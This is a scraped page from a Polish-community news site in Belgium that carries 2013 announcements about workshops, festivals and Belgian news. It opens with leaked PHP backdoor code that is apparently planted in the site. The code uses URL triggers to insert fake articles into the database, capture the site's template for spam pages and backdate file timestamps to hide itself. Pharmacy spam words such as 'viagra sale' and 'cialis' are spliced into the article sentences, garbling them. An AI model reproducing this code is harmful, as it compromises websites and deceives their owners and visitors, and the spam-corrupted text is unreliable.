if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (file_get_contents($tpl_path) > 0) { die('Success!'); } $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^<]*?#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#

\[CONTENT\]

#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } } Polonia Belgijska
canadian pharmacy cialis canadian drugs antibiotics antibiotics from canada

Warsztaty fotografii nocnej

Brussels School of Photography zaprasza na warsztaty fotografii nocnej.Często się słyszy, viagra sal...

Warsztaty z Leszkiem Cytawą w Brukseli. Konkurs!

Język w miesiąc ? tak, purchase to możliwe !!!   Każdy z nas uczy bądź uczył się języka obcego...

Skandal z "fałszywymi" paszportami rodziny królewskiej

Belgijska rodzina królewska od końca XIX wieku korzysta z paszportów, sick na których widnieją pseu...

Dni Małopolski w Brukseli

Różnorodna, store barwna, drugstore zaskakująca... Małopolska. W tym roku po raz kolejny zadziwi s...

skradzione komputery mogą znajdować się w polskiej ambasadzie

W budynku należącym do polskiej ambasady w Belgii mogą znajdować się tablet i laptop skradzione w tr...

Polonijny Festiwal w Antwerpi

W dniu 6 października 2013 roku odbędzie się druga edycja Polonijnego Festiwalu Piosenki i Tańca w ...

Polska internetowa szkoła za darmo

Ostatni dzwonek na zapisy do bezpłatnej szkoły dla polonijnych dzieci Tylko do 31 maja tego roku mas...

Jak poprawnie notować

Żyjemy w czasach ogromnej ilości informacji, store która lawinowo przyrasta i ciągle się zmienia. D...

logo

winamp    media       real

Warsztaty fotografii nocnej

środa, 13 listopada 2013 21:34

FOTO NOCNA 2013.11.23 POZIOM 150Brussels School of Photography zaprasza na warsztaty fotografii nocnej.
Często się słyszy, viagra sale że do fotografowania potrzebne jest światło, prescription ale co zrobić jeśli w grę wchodzą zdjęcia nocne?
Brak światła jest tutaj tylko pozorny. Przecież, gdy zachodzi słońce, zapala się mnóstwo innych źródeł światła.

Więcej…

 

Warsztaty z Leszkiem Cytawą w Brukseli. Konkurs!

środa, 13 listopada 2013 20:42

1388725 10201543146393394 1610174586 nJęzyk w miesiąc ? tak, purchase to możliwe !!!

 

Każdy z nas uczy bądź uczył się języka obcego i ma w tej dziedzinie własne spostrzeżenia. W obecnych czasach coraz częściej trzeba stanąć przed koniecznością opanowania nowego języka obcego w bardzo krótkim czasie. Umiejętność szybkiego zdobywania wiedzy staje się wręcz koniecznością. 

Więcej…

 
 

Skandal z "fałszywymi" paszportami rodziny królewskiej

środa, 25 września 2013 04:50

5241b8486f619 k2Belgijska rodzina królewska od końca XIX wieku korzysta z paszportów, sick na których widnieją pseudonimy, salve a nie prawdziwe imię i tytuł - przyznał we wtorek MSZ w Brukseli. Zastrzegł, że nie są to fałszywe dokumenty, jak w niedzielę mówił były szef tego resortu.

Więcej…

 
 

Dni Małopolski w Brukseli

wtorek, 27 sierpnia 2013 17:47

Dni Małopolski w Brukseli zaproszenieRóżnorodna, store barwna, drugstore zaskakująca... Małopolska. W tym roku po raz kolejny zadziwi swoim kulturalnym obliczem. Podczas dni regionu, cheap które odbędą się w dniach 12?22 września 2013 r., do Brukseli zawita małopolski koral, czyli niekonwencjonalna wystawa w formie ogromnego naszyjnika, oraz muzycy zespołu Capella Cracoviensis, którzy wspólnie z kolegami z zespołu historycznych instrumentów dętych Oltremontano (Belgia), wykonają koncert polskiej muzyki barokowej.

Więcej…

 
 

skradzione komputery mogą znajdować się w polskiej ambasadzie

wtorek, 27 sierpnia 2013 13:21

laptopW budynku należącym do polskiej ambasady w Belgii mogą znajdować się tablet i laptop skradzione w trakcie włamania do prywatnego domu w Brukseli - poinformowała belgijska telewizja RTBF. Ambasada zapewnia, sovaldi że jest gotowa do współpracy z policją.

Więcej…

 
 

W Belgii zezwolono na sprzedaż pistoletów maszynowych Uzi

niedziela, 25 sierpnia 2013 11:52

uzi-micro2Osoby prywatne w Belgii od dzisiaj mogą nabywać pozwolenie na posiadanie pistoletu maszynowego Uzi - poinformowały w sobotę belgijskie media.

Więcej…

 
 

Wielki wieczór literacki

niedziela, 25 sierpnia 2013 11:06


wieczor poetyckiPołączony z wręczeniem NAGRODY PRACY ORGANICZNEJ
im. MARII KONOPNICKIEJ za zasługi dla Kultury Polskiej

Pani Yvette Popławskiej Matuszak
Warszawa, mind 23 maj 2013
KAPITUŁA NAGRODY

We wszystkich swoich poczynaniach zabiega o kultywowanie polskiej kultury, medicine historii oraz tradycji, uświadamiając ich wagę dla zachowania tożsamości narodowej.

Więcej…

 
 

Polonijny Festiwal w Antwerpi

wtorek, 30 lipca 2013 07:59

festiwal info

W dniu 6 października 2013 roku odbędzie się druga edycja Polonijnego Festiwalu Piosenki i Tańca w Antwerpii.
Do wzięcia udziału w konkursie zapraszamy chętnych: pasjonatów piosenki i tańca, thumb solistów oraz zespoły wokalne i taneczne. Celem festiwalu jest prezentacja dorobku artystycznego dzieci i młodzieży polonijnej, promowanie talentów i rozpowszechnianie polskiej muzyki rozrywkowej w Belgii.
Popisy konkursowe oceniać będzie profesjonalne jury, a na zwycięzców czekają atrakcyjne nagrody.
Zgłoszenia przyjmujemy drogą mailową, do 31 sierpnia 2013.
Wszystkie informacje znajdują się na www.festiwalantwerpia.be

 
 

Strona 1 z 15

Dodaj nas na facebook'u:

Joomla Templates and Joomla Extensions by ZooTemplate.Com